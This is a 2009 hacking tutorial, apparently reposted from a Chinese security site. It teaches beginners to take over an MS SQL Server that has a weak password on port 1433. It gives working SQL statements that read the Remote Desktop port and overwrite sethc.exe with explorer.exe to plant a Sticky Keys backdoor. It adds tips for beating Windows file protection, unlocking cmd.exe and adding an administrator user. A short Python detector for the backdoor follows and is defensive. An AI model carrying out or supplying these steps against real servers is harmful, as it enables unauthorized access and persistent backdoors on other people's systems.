1433 weak passwords: clever privilege escalation with the Shift function - vulnerability warning - Black Bar Security Net

ID MYHACK58:62200923251
Type myhack58
Reporter Anonymous
Modified 2009-05-15T00:00:00


This is the third tutorial on 1433 weak passwords. The previous two explained repairing 1433 and escalating privileges in detail; today we again cover a privilege escalation method for 1433 weak passwords. It is a clever one, though in fact many experts have long been using it. This tutorial is intended for beginners learning privilege escalation through 1433 weak passwords; masters, please disregard. Connect to the weak-password host!

Run any DOS command and you get the error message:

    Error Message: xpsql.cpp: error 5 from CreateProcess (line 737)

The server in the previous tutorial gave the same error. There we bypassed the error to get a webshell: we found a website on the server, uploaded a small webshell with the query separator tool, and then uploaded a full-featured webshell. This time we discuss the cause of this error and a clever fix for it, which can also be described as bypassing it to escalate privileges.

Error 5 is a system error number, and CreateProcess means to create a thread. The error is closely related to the system file cmd.exe: in one case cmd has been deleted, in the other the permissions on cmd have been reduced. (If anything I say here is wrong, please point it out, masters; this is how I understand it.)

Go to the windows\system32 directory and the SQL installation directory to see whether the required files are there. cmd.exe exists! odsole70.dll is there too. Why check for this file? Because the stored procedures we want to use need it.

Next, first check the terminal port and whether it is open. Enter this SQL command:

    exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'

It returns successfully: the terminal port is 78. Open the 3389 (Remote Desktop) client with the command mstsc and connect to IP:78. The login screen appears, which proves that port 78 is open to the outside.

Now the key part. We use two SQL commands to copy the system's Explorer file over the Shift backdoor file. The following two statements are executed separately, not together. I ran them in the SQL Tools 2.0 tool; you can also run them in the query separator tool. Remember to execute them separately.

    -- This statement copies explorer.exe to sethc.exe
    declare @o int
    exec sp_oacreate 'scripting.filesystemobject', @o out
    exec sp_oamethod @o, 'copyfile', null, 'c:\windows\explorer.exe', 'c:\windows\system32\sethc.exe';

    -- This statement copies sethc.exe to the dllcache directory
    declare @oo int
    exec sp_oacreate 'scripting.filesystemobject', @oo out
    exec sp_oamethod @oo, 'copyfile', null, 'c:\windows\system32\sethc.exe', 'c:\windows\system32\dllcache\sethc.exe';

The interval between executing these two statements should preferably not exceed 10 seconds, otherwise the system will automatically restore the original file. In addition, both statements use the sp_oacreate stored procedure, which needs the file odsole70.dll, so whether this file exists determines whether the creation succeeds.

Anyone who has played with Shift backdoors will see at a glance that this is one of the oldest ways to create one. Having read this far, probably half of you want to close the page, so the remaining half of us rookies will continue the exchange. Those who left are the masters ^_^

There is no screenshot for this part; just check the returned information. The copy succeeded. Now connect to 3389 and try the Shift backdoor! After pressing Shift five times, Explorer pops up.

Go to the windows\system32 directory, find cmd.exe and double-click it to try to run it! It says you do not have the appropriate permissions to run it. Right-click cmd.exe, choose Properties and look under the Security tab: all of SYSTEM's permissions are set to Deny. Select Allow for Full Control and click Apply to change the permissions on cmd so that it can run. OK, now double-click cmd again and it runs; use the net user command below to add a user and escalate privileges.

A tip: if you now go back to SQL Tools and run a DOS command, you will find that it works normally. This shows that the error "Error Message: xpsql.cpp: error 5 from CreateProcess (line 737)" is caused by the permissions on cmd. After meeting this problem once, you will know how to handle it.

Finally, log in to the server with the newly added user; note the terminal port.
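From the defender's side, the file replacement described above is easy to test for: sethc.exe (in system32 or dllcache) should never have the same content as explorer.exe or cmd.exe. The following check is an added example, not part of the original tutorial; the function names and the constructed sample tree are assumptions made for illustration.

```python
import hashlib
import tempfile
from pathlib import Path

# Paths relative to the Windows directory. explorer.exe and cmd.exe are the
# two binaries the tutorial involves; sethc.exe is checked in both places
# the tutorial writes to.
SUSPECT_SOURCES = ("explorer.exe", "system32/cmd.exe")
STICKY_KEYS = ("system32/sethc.exe", "system32/dllcache/sethc.exe")


def sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()


def check_sticky_keys(windir):
    """Report sethc.exe copies whose content equals another system binary."""
    windir = Path(windir)
    known = {}
    for rel in SUSPECT_SOURCES:
        if (windir / rel).is_file():
            known[sha256(windir / rel)] = rel
    findings = []
    for rel in STICKY_KEYS:
        target = windir / rel
        if target.is_file() and sha256(target) in known:
            findings.append((rel, known[sha256(target)]))
    return findings


def build_sample_tree(root, tampered):
    """Constructed stand-in for a Windows directory so the check runs offline."""
    root = Path(root)
    (root / "system32" / "dllcache").mkdir(parents=True)
    (root / "explorer.exe").write_bytes(b"constructed explorer image")
    (root / "system32" / "cmd.exe").write_bytes(b"constructed cmd image")
    sethc = b"constructed explorer image" if tampered else b"constructed sethc image"
    for rel in STICKY_KEYS:
        (root / rel).write_bytes(sethc)
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel, source in check_sticky_keys(build_sample_tree(tmp, tampered=True)):
            print(f"ALERT: {rel} is a byte-for-byte copy of {source}")
```

On a real host, pass the actual Windows directory to check_sticky_keys; any finding means the accessibility binary has been overwritten and the machine should be treated as compromised.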
After the previous tutorial, someone asked me what to do if the server has no website on it. In fact, there are many ways to escalate privileges; sometimes a single method will not succeed, and you can consider combining several. That is all I will introduce in these three consecutive tutorials on 1433 weak passwords; when I have learned more methods I will share them. Thank you all for your patience in reading this tutorial. This tutorial is only for learning and exchange; please do not use it for illegal purposes.